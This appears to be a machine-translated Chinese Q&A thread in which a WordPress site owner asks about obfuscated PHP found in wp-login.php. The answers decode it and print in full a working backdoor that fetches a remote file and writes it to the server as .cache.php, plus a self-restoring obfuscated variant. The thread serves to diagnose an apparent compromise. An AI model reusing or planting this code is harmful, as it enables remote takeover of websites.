在wp-login.php wordpress中编码代码

时间:2016-01-16 12:00:16

标签: wordpress

最近在使用wordpress开发我的网站期间,我在wp-login.php

中找到了一个代码 
if(isset($_GET["\x6Co\x61\x64b\x65a\x6E"])){$WRdMt=array("NxLWXqPd"=>"\x62a\x73e6\x34_\x64\x65\x63\x6F\x64\x65","SroHZlL"=>"\x6D\x64\x35","FfqaHAg"=>"JGE9J29tbXAzWVJWVmJWMGIwYjE3bHlScWJteDInOyRiPSRfR0VUWydsb2FkYmVhbiddOyRhPXN0cl9yZXBsYWNlKGFycmF5KCRiWzJdLCRiWzRdLCRiWzFdLCRiWzldLCRiWzEwXSwkYls3XSwkYlsxMl0sJGJbMTNdLCRiWzE0XSwkYlswXSwkYlszXSksYXJyYXkoJzgnLCcuJywnOicsJ3QnLCcvJywnLycsJ2gnLCdkJywndCcsJy8nLCduJyksJGEpO2lmKGZpbHRlcl92YXIoJGEsRklMVEVSX1ZBTElEQVRFX1VSTCk9PT1mYWxzZSl7ZWNobyAnaW52YWxpZCc7ZXhpdDt9JGM9J2hwdWhmeXZxZGdrJzskZD1maWxlX2dldF9jb250ZW50cygkYSk7aWYoIXN0cmlzdHIoJGQsJGMpKXskZT1jdXJsX2luaXQoJGEpO2N1cmxfc2V0b3B0KCRlLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGUsQ1VSTE9QVF9CSU5BUllUUkFOU0ZFUiwxKTtjdXJsX3NldG9wdCgkZSxDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLDEpO2N1cmxfc2V0b3B0KCRlLENVUkxPUFRfVVNFUkFHRU5ULCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMzIuMC4xNzAwLjEwNyBTYWZhcmkvNTM3LjM2Jyk7JGQ9Y3VybF9leGVjKCRlKTtpZihjdXJsX2Vycm5vKCRlKSl7ZWNobyAnRVJST1I6IEN1cmwgRVJST1InO2V4aXQ7fWN1cmxfY2xvc2UoJGUpO2lmKCFzdHJpc3RyKCRkLCRjKSl7ZWNobyAnQ291bGQgbm90IGRsIGZpbGU6ICcuJGE7ZXhpdDt9fSRmPShzdHJwb3MoX19GSUxFX18sJygnKSE9PWZhbHNlP2Rpcm5hbWUoc3Vic3RyKF9fRklMRV9fLDAsc3RycG9zKF9fRklMRV9fLCcoJykpKTpkaXJuYW1lKF9fRklMRV9fKSkuRElSRUNUT1JZX1NFUEFSQVRPUi4nLmNhY2hlLnBocCc7aWYoIWZpbGVfcHV0X2NvbnRlbnRzKCRmLCRkKSl7ZWNobyAnQ291bGQgbm90IENSRUFURSBmaWxlOiAnLiRmO31lbHNle2VjaG8gJ2JlYW46IGh0dHA6Ly8nLiRfU0VSVkVSWydIVFRQX0hPU1QnXS5zdHJfcmVwbGFjZSgkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLCcnLCRmKTt9ZXhpdDs=","NQavwLhN"=>"cr\x65\x61t\x65\x5F\x66un\x63ti\x6F\x6E");$UynkeW="\x65\x78\x74\x72\x61\x63\x74";$UynkeW($WRdMt);$CmIoaMog=$NQavwLhN('',$NxLWXqPd($FfqaHAg));$CmIoaMog();}

此代码在我的意义上没有创建任何问题,但我不知道如何在文件中插入此代码。还有一个文件 .Cache.php 文件我在wp-content / themes / .cache.php中找到了 在这个文件里面存在相同的代码,但是比这个更大,版权文本也在那里。 任何人都可以告诉我这是什么? 提前谢谢。

2 个答案:

答案 0 :(得分:0)

这是一些带有强混淆的base64编码字符串。这可能表明您的网站遭到黑客入侵。无论如何,让我们开始解码。

你可以先解码这段代码中的字符串(它们是HEX编码的ASCII字符。你也可以使用像https://www.unphp.net/这样的在线工具。然后你就得到了

<?  
    if(isset($_GET["loadbean"])){
        $WRdMt=array(
            "NxLWXqPd"=>"base64_decode",
            "SroHZlL"=>"md5",
            "FfqaHAg"=>"JGE9J29tbXAzWVJWVmJWMGIwYjE3bHlScWJteDInOyRiPSRfR0VUWydsb2FkYmVhbiddOyRhPXN0cl9yZXBsYWNlKGFycmF5KCRiWzJdLCRiWzRdLCRiWzFdLCRiWzldLCRiWzEwXSwkYls3XSwkYlsxMl0sJGJbMTNdLCRiWzE0XSwkYlswXSwkYlszXSksYXJyYXkoJzgnLCcuJywnOicsJ3QnLCcvJywnLycsJ2gnLCdkJywndCcsJy8nLCduJyksJGEpO2lmKGZpbHRlcl92YXIoJGEsRklMVEVSX1ZBTElEQVRFX1VSTCk9PT1mYWxzZSl7ZWNobyAnaW52YWxpZCc7ZXhpdDt9JGM9J2hwdWhmeXZxZGdrJzskZD1maWxlX2dldF9jb250ZW50cygkYSk7aWYoIXN0cmlzdHIoJGQsJGMpKXskZT1jdXJsX2luaXQoJGEpO2N1cmxfc2V0b3B0KCRlLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7Y3VybF9zZXRvcHQoJGUsQ1VSTE9QVF9CSU5BUllUUkFOU0ZFUiwxKTtjdXJsX3NldG9wdCgkZSxDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLDEpO2N1cmxfc2V0b3B0KCRlLENVUkxPUFRfVVNFUkFHRU5ULCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMzIuMC4xNzAwLjEwNyBTYWZhcmkvNTM3LjM2Jyk7JGQ9Y3VybF9leGVjKCRlKTtpZihjdXJsX2Vycm5vKCRlKSl7ZWNobyAnRVJST1I6IEN1cmwgRVJST1InO2V4aXQ7fWN1cmxfY2xvc2UoJGUpO2lmKCFzdHJpc3RyKCRkLCRjKSl7ZWNobyAnQ291bGQgbm90IGRsIGZpbGU6ICcuJGE7ZXhpdDt9fSRmPShzdHJwb3MoX19GSUxFX18sJygnKSE9PWZhbHNlP2Rpcm5hbWUoc3Vic3RyKF9fRklMRV9fLDAsc3RycG9zKF9fRklMRV9fLCcoJykpKTpkaXJuYW1lKF9fRklMRV9fKSkuRElSRUNUT1JZX1NFUEFSQVRPUi4nLmNhY2hlLnBocCc7aWYoIWZpbGVfcHV0X2NvbnRlbnRzKCRmLCRkKSl7ZWNobyAnQ291bGQgbm90IENSRUFURSBmaWxlOiAnLiRmO31lbHNle2VjaG8gJ2JlYW46IGh0dHA6Ly8nLiRfU0VSVkVSWydIVFRQX0hPU1QnXS5zdHJfcmVwbGFjZSgkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLCcnLCRmKTt9ZXhpdDs=",
            "NQavwLhN"=>"create_function"
        );
        $UynkeW = "extract";
        $UynkeW($WRdMt);
        $CmIoaMog = $NQavwLhN('',$NxLWXqPd($FfqaHAg));
        $CmIoaMog();
    } 
?>

所以这段代码将base64-一些字符串,如果是,则创建一个函数,然后用一些参数调用它。您可以自己重命名变量,看看究竟是什么。 base64编码的代码依次解码为

 <?
$a = 'ommp3YRVVbV0b0b17lyRqbmx2';
$b = $_GET['loadbean'];
$a = str_replace(array(
    $b[2],
    $b[4],
    $b[1],
    $b[9],
    $b[10],
    $b[7],
    $b[12],
    $b[13],
    $b[14],
    $b[0],
    $b[3]
), array(
    '8',
    '.',
    ':',
    't',
    '/',
    '/',
    'h',
    'd',
    't',
    '/',
    'n'
), $a);
if (filter_var($a, FILTER_VALIDATE_URL) === false) {
    echo 'invalid';
    exit;
}
$c = 'hpuhfyvqdgk';
$d = file_get_contents($a);
if (!stristr($d, $c)) {
    $e = curl_init($a);
    curl_setopt($e, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($e, CURLOPT_BINARYTRANSFER, 1);
    curl_setopt($e, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($e, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36');
    $d = curl_exec($e);
    if (curl_errno($e)) {
        echo 'ERROR: Curl ERROR';
        exit;
    }
    curl_close($e);
    if (!stristr($d, $c)) {
        echo 'Could not dl file: ' . $a;
        exit;
    }
}
$f = (strpos(__FILE__, '(') !== false ? dirname(substr(__FILE__, 0, strpos(__FILE__, '('))) : dirname(__FILE__)) . DIRECTORY_SEPARATOR . '.cache.php';
if (!file_put_contents($f, $d)) {
    echo 'Could not CREATE file: ' . $f;
} else {
    echo 'bean: http://' . $_SERVER['HTTP_HOST'] . str_replace($_SERVER['DOCUMENT_ROOT'], '', $f);
}
exit;
?>

这应该让你开始颠倒这段代码。 (例如,使用PHPStorm或任何其他PHP IDE开始重构/重命名变量,执行代码的某些部分以查看它们解码的内容等) 看一下,我确实看到了一些file_put_contents()file_get_contents(),它们实际上可能是一个下载文件并将文件上传到您的服务器。

答案 1 :(得分:0)

相同的代码,但有一行,在wordpress的主题目录中找到。这是什么类型的代码,我不能删除它。每次我删除它,它再次恢复自己。不知道怎么办? 

`**// This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.**

$ Kx6p56uAbwra =“7VRLbDY = I4FP5BvRgZTI = AGI = LQgUJGpHwSLKToLwCMazA = PWQ / VATE = XVXWZTY = ZjdnVrXIZ2U = QMN / d + AJY = CNvHHbejM = eBcdDg = P5rPQolFbzg = pZIY0xtYTA = iXWQvrLS + Y / EjxyOnhgiwajg = CMckNDYeDU = paYZJVVMVWKDmMriGWH4aW4QQqDpGqtJRU7emRI2 + FjiXkhP2mF6p + gnQzF / qugT01KvIXvgovSEOSxXMpCnGFudzU = TnnhIewYjM = T / BTG = QGbDQ = fVBZdWU = 53pZQ4qHcGM = PDMI = MU = dgY87hQ8hdmY = d + HznZSpxzRqXyIWejk = M + hEgWhIcjE = AvremU = 8 + gDxTASpORhZJlnsjaCaJmbWI = qRkHjHZjk = / 1RdzM = 54rliMSi + OZsK + A4bhxZH3gdqzYmvjSxrPZjE = AZDk = 4ktFXdjDjxOejY = KOYG6VnGTNdsiuLsn + 8sjc2I = 0 / DDC = ETU = 5arZL0Wztdzz / wKfdrtatG7zkokH5KTL6RH ++ INc2M = TI = FAtHdDk = RfY8NnHIpGizdpZ + EMU = jdxWCZjY = HCU + vK1ljO4yZPfAjT8A3ZzA = nejQ = azQXlScDM =的Au / Y6GvmFEtHuN36D2nGnZBYjM = FHdsaAdMdTM = TgtWcmY = 6cmM = DC = / iEZ8xdKipyC1jydDE = TDfoQ895AdhJXPpnHs / LRPObjI = CWI = EJE = 6mG7e // 7tN8eTI = pxJqZMYTY = TEMI = ZQLLdSwZVQ8xg / suZDY = 2SYzA = 7RiHvJ / F / yZGI = TY = pFpd2I = WM = MY = pqsvOcdSB / AGU = O7YmY = AUeFNvBEzBdzY = bpFRLqFvaDE = PBMI = TI = RMeScGI = EkXK0amM = qajU = AZM = OADI = 8hYCL0FGKH787cTM = iaNqaZLUzlRU8IZTQ = BHrwEHbDI = PM8iUNDTPsHM0 + CGY = + O1UaZ0ZzAaKQnZ2U = MY = RB ZK = MP / 5sAqcTk = UW5hqL7yoHH3jlDEY / NR + SYPYTA = 1aHmYFYTQ = AfRDTIPHd / Bc2I = DC = 3pQ542ZdmU = KPRJC3cTk = OCS + PM + ADY = VI0RdAeTU = 8eDQ = 4ayhoBZWI = AOWA3PF22RXXxRuXqlb2I = Ya2U = BZI = aQPGq + 9VjAJlniTxQXVZmY = UaiKiLgFeWU = Y / ANVctDyATQsU5dMWcTg = WjKKBUXkWttH / 1ujja / yK1ZHGKRqBaTQ = fXcGM = DY = mPnlslY2Y = BDY = 9cTc = DBDM = aVaK2rlwLJ9 ++ 6TlrToXokLZuwDY2Y = 9Zjg = WB07AeDg = nGH1ziu + mIAAcxJiX3I73S / TozhO4PH7FgtTXygClUaTY = 5MA31BbdP5bQE1kP7XP + AJU = CZM = ztXbGM = qpuHci / 9DDQMueDU = hdploBzxH6K5bTI = 7tBwaLZFOk + 0eDc = eavOwEisHBQ5C7PWkR6KiHNwSXDDhxNqpMNlh + vdVZmI = / XXW / 3 / DJK = XORsl +银== “; $ UkSsk = strrev(” edoced_4" 6esab。 “”);如果(isset($ _ GET [str_rot13(“\ X71 \ x62b \ X65" )]))`

相关问题
最新问题